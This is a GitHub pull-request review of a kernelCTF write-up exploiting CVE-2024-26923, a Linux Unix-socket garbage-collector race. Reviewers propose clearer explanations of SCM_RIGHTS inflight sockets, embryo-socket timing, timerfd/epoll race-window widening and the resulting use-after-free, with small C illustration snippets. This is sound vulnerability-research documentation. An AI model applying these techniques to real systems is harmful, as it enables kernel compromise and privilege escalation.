kernelCTF: add CVE-2024-26923_lts_cos#308
lambdasprocket wants to merge 1 commit into google:master
|
|
||
| We have to use the other CPU available to perform 2 operations during this window: | ||
| 1. Send the victim socket through this connecting socket. | ||
| 2. Close the victim socket |
| 2. Close the victim socket | |
| 2. Close the victim socket, so that its standard file reference count drops to zero, leaving only the garbage collector's internal references. |
| We have to use the other CPU available to perform 2 operations during this window: | ||
| 1. Send the victim socket through this connecting socket. | ||
| 2. Close the victim socket | ||
| 3. Trigger garbage collection and run unix_gc() until the start of window 2. |
| 3. Trigger garbage collection and run unix_gc() until the start of window 2. | |
| 3. Trigger garbage collection by closing an unrelated socket, which forces `unix_gc()` to wake up and scan the inflight list, and let `unix_gc()` run until the start of window 2. |
| This function is triggered by executing connect on CPU 0. This CPU will do nothing else until the race conditions part of the exploit is over. | ||
|
|
||
| We have to use the other CPU available to perform 2 operations during this window: | ||
| 1. Send the victim socket through this connecting socket. |
| 1. Send the victim socket through this connecting socket. | |
| 1. Send the victim socket through this connecting socket, using SCM_RIGHTS to make it an 'inflight' socket, which forces the garbage collector to track it. | |
| > Note: SCM_RIGHTS is a special message type that allows Unix sockets to send open file descriptors to each other. When a socket is sent this way but hasn't been read out of the queue yet, it is considered "inflight." The garbage collector specifically tracks inflight sockets to prevent cyclic memory leaks. |
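To make the SCM_RIGHTS step concrete, here is a minimal sketch of passing a descriptor over a connected Unix socket. The helper names `send_fd` and `recv_fd` are hypothetical and not taken from the exploit in this PR; the receive side is included only so the sketch can be exercised end to end. Between the `sendmsg()` and the matching `recvmsg()`, the passed socket is what the note above calls "inflight".

```c
#include <assert.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <unistd.h>

/* Control buffer sized and aligned for exactly one file descriptor. */
union fd_ctrl {
    char buf[CMSG_SPACE(sizeof(int))];
    struct cmsghdr align;
};

/* Hypothetical helper: send fd_to_send over the connected Unix socket `via`.
 * Returns 0 on success, -1 on error. */
int send_fd(int via, int fd_to_send)
{
    char dummy = 'x'; /* at least one data byte must accompany the cmsg */
    struct iovec iov = { .iov_base = &dummy, .iov_len = 1 };
    union fd_ctrl ctrl;
    struct msghdr msg;
    struct cmsghdr *cmsg;

    assert(fd_to_send >= 0);
    memset(&ctrl, 0, sizeof(ctrl));
    memset(&msg, 0, sizeof(msg));
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = ctrl.buf;
    msg.msg_controllen = sizeof(ctrl.buf);

    cmsg = CMSG_FIRSTHDR(&msg);
    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type = SCM_RIGHTS;
    cmsg->cmsg_len = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(cmsg), &fd_to_send, sizeof(int));

    return sendmsg(via, &msg, 0) == 1 ? 0 : -1;
}

/* Hypothetical helper: receive one descriptor from `via`.
 * Returns the new descriptor, or -1 on error. */
int recv_fd(int via)
{
    char dummy;
    struct iovec iov = { .iov_base = &dummy, .iov_len = 1 };
    union fd_ctrl ctrl;
    struct msghdr msg;
    struct cmsghdr *cmsg;
    int fd = -1;

    memset(&ctrl, 0, sizeof(ctrl));
    memset(&msg, 0, sizeof(msg));
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = ctrl.buf;
    msg.msg_controllen = sizeof(ctrl.buf);

    if (recvmsg(via, &msg, 0) != 1)
        return -1;
    cmsg = CMSG_FIRSTHDR(&msg);
    if (cmsg == NULL || cmsg->cmsg_level != SOL_SOCKET ||
        cmsg->cmsg_type != SCM_RIGHTS)
        return -1;
    memcpy(&fd, CMSG_DATA(cmsg), sizeof(int));
    return fd;
}
```

In the scenario described here, `via` would be the connecting client socket and `fd_to_send` the victim socket; closing the victim right after `send_fd()` leaves the queued message as its only remaining file reference.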
| ... | ||
| ``` | ||
|
|
||
| This function is triggered by executing connect on CPU 0. This CPU will do nothing else until the race conditions part of the exploit is over. |
| This function is triggered by executing connect on CPU 0. This CPU will do nothing else until the race conditions part of the exploit is over. | |
| This function is triggered by executing connect on CPU 0. To win the race, the exploit intentionally stalls this thread right inside Window 1. This CPU will do nothing else until the race conditions part of the exploit is over, leaving the newly created "embryo" socket (newsk) allocated but not yet linked to the receive queue. |
Please check all of my assumptions, which I have written in the form of "suggestions". If you have an idea for explaining any of them better, please do.
|
|
||
| This function is triggered by executing connect on CPU 0. This CPU will do nothing else until the race conditions part of the exploit is over. | ||
|
|
||
| We have to use the other CPU available to perform 2 operations during this window: |
| We have to use the other CPU available to perform 2 operations during this window: | |
| We have to use the other CPU available to perform 3 operations during this window: |
| 1. The first scan_children() can not see the embryo in the receive queue of the server socket | ||
| 2. The second scan_children() has to see the embryo. | ||
|
|
||
| This causes a decrement/increment mismatch and the resulting use-after-free. |
| This causes a decrement/increment mismatch and the resulting use-after-free. | |
| This causes a decrement/increment mismatch and the resulting use-after-free. Because the garbage collector does not expect an embryo to be enqueued mid-scan, it misses the embryo during the first pass (failing to decrement the victim's `u->inflight` counter). When the stalled thread unfreezes, the embryo is enqueued. The GC sees it during the second pass and increments the victim's count. The victim's inflight count in `unix_sock` is now artificially high, leaving a dangling pointer in the `gc_inflight_list` when the socket is closed. |
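The counter arithmetic behind this mismatch can be checked with a toy model. This is a deliberately simplified sketch, not kernel code: `toy_sock`, `toy_gc_pass` and `toy_gc` are hypothetical names, and the model ignores candidate selection, locking and list handling in the real `unix_gc()`. It only tracks whether the embryo is visible in each of the two scans.

```c
#include <assert.h>

/* Toy stand-in for the inflight counter kept per Unix socket. */
struct toy_sock {
    long inflight;
};

/* One scan pass: if the embryo carrying the victim is visible in the
 * listener's receive queue, apply delta to the victim's counter. */
void toy_gc_pass(struct toy_sock *victim, int embryo_visible, long delta)
{
    if (embryo_visible)
        victim->inflight += delta;
}

/* Run the decrement pass, then the restoring increment pass, and
 * return the victim's final inflight count. */
long toy_gc(long initial_inflight, int visible_pass1, int visible_pass2)
{
    struct toy_sock victim = { .inflight = initial_inflight };

    assert(initial_inflight >= 0);
    toy_gc_pass(&victim, visible_pass1, -1); /* first scan: decrement */
    toy_gc_pass(&victim, visible_pass2, +1); /* second scan: increment */
    return victim.inflight;
}
```

With the embryo visible in both passes the count is unchanged (`toy_gc(1, 1, 1)` gives 1). With the embryo hidden in the first pass and visible in the second (`toy_gc(1, 0, 1)`) the count ends at 2, which matches the inflight value of 2 mentioned later in the write-up.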
| @@ -0,0 +1,219 @@ | |||
| ## Triggering the race condition | |||
Could you elaborate on the setup needed to trigger the race?
From what I see, the exploit sets up a listening server socket, a client socket to connect to it, and a separate "victim" socket that will eventually be corrupted. During the client's connect() call, the kernel dynamically allocates a new socket (the "embryo") to represent the server's side.
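If my reading is right, the setup could be sketched roughly as follows. This is an illustration under assumptions, not the exploit's actual code: `struct race_sockets`, `setup_race_sockets` and `connect_client` are hypothetical names, and the sketch relies on the Linux autobind feature (a `bind()` with `addrlen == sizeof(sa_family_t)`) only to get a unique abstract address without picking a name.

```c
#include <assert.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <unistd.h>

/* Hypothetical container for the three sockets described above. */
struct race_sockets {
    int server;               /* listening socket; the embryo lands in its receive queue */
    int client;               /* its connect() makes the kernel allocate the embryo */
    int victim;               /* later sent via SCM_RIGHTS and closed */
    struct sockaddr_un addr;  /* address the server was autobound to */
    socklen_t addrlen;
};

/* Create the sockets and put the server into the listening state.
 * Returns 0 on success, -1 on error. */
int setup_race_sockets(struct race_sockets *s)
{
    struct sockaddr_un any;

    assert(s != NULL);
    memset(s, 0, sizeof(*s));
    memset(&any, 0, sizeof(any));
    any.sun_family = AF_UNIX;

    s->server = socket(AF_UNIX, SOCK_STREAM, 0);
    s->client = socket(AF_UNIX, SOCK_STREAM, 0);
    s->victim = socket(AF_UNIX, SOCK_STREAM, 0);
    if (s->server < 0 || s->client < 0 || s->victim < 0)
        return -1;

    /* addrlen == sizeof(sa_family_t) asks Linux to autobind the socket
     * to a unique abstract address. */
    if (bind(s->server, (struct sockaddr *)&any, sizeof(sa_family_t)) < 0)
        return -1;
    if (listen(s->server, 1) < 0)
        return -1;

    /* Remember the chosen address so the client can connect to it. */
    s->addrlen = sizeof(s->addr);
    if (getsockname(s->server, (struct sockaddr *)&s->addr, &s->addrlen) < 0)
        return -1;
    return 0;
}

/* The connect() call during which the kernel creates the embryo socket
 * and queues it on the server. Returns 0 on success, -1 on error. */
int connect_client(const struct race_sockets *s)
{
    return connect(s->client, (const struct sockaddr *)&s->addr, s->addrlen);
}
```

In the race itself, `connect_client()` would be the call issued on CPU 0; the server never needs to call `accept()`, since the embryo only has to sit in (or be missing from) the server's receive queue.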
| To have a chance of aligning the two threads correctly we have to extend both race windows as much as possible. | ||
| To do that we use a well-known timerfd technique invented by Jann Horn. | ||
| The basic idea is to set hrtimer based timerfd to trigger a timer interrupt during our race window and attach a lot (as much as RLIMIT_NOFILE allows) | ||
| of epoll watches to this timerfd to make the time needed to handle the interrupt longer. |
| of epoll watches to this timerfd to make the time needed to handle the interrupt longer. | |
| of epoll watches to this timerfd. When the timer fires, the kernel is forced to slowly iterate over hundreds of these watchers inside the interrupt handler, artificially stretching the race window from nanoseconds to milliseconds. |
|
|
||
| ## Exploiting the use-after-free | ||
|
|
||
| At this point our victim socket is inflight, linked in the gc_inflight_list and has a inflight reference value of 2. |
| At this point our victim socket is inflight, linked in the gc_inflight_list and has a inflight reference value of 2. | |
| At this point our victim socket is inflight, linked in the `gc_inflight_list`, and has an inflight reference value of 2 (stored inside `struct unix_sock`). |
| ## Exploiting the use-after-free | ||
|
|
||
| At this point our victim socket is inflight, linked in the gc_inflight_list and has a inflight reference value of 2. | ||
| Next step is to receive this socket and close it. This will cause its struct sock object to be freed, but it will stay referenced in the gc_inflight_list. |
| Next step is to receive this socket and close it. This will cause its struct sock object to be freed, but it will stay referenced in the gc_inflight_list. | |
| Next step is to receive this socket and close it. Receiving it drops the inflight count from 2 down to 1, and closing it drops its standard file descriptor reference count to 0. This will cause its struct sock object to be freed, but it will stay referenced in the gc_inflight_list. |